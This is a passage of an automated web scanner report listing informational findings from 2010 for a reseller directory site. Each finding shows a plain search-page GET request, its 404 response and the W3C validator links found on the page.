<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.197. http://www.resellerbase.com/detail/39/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/39/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.198. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.199. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.200. http://www.resellerbase.com/detail/39/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.201. http://www.resellerbase.com/detail/39/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.202. http://www.resellerbase.com/detail/4/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/4/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.203. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.204. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.205. http://www.resellerbase.com/detail/4/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.206. http://www.resellerbase.com/detail/4/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.207. http://www.resellerbase.com/detail/40/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/40/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.208. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.209. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.210. http://www.resellerbase.com/detail/40/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.211. http://www.resellerbase.com/detail/40/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.212. http://www.resellerbase.com/detail/41/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/41/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.213. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
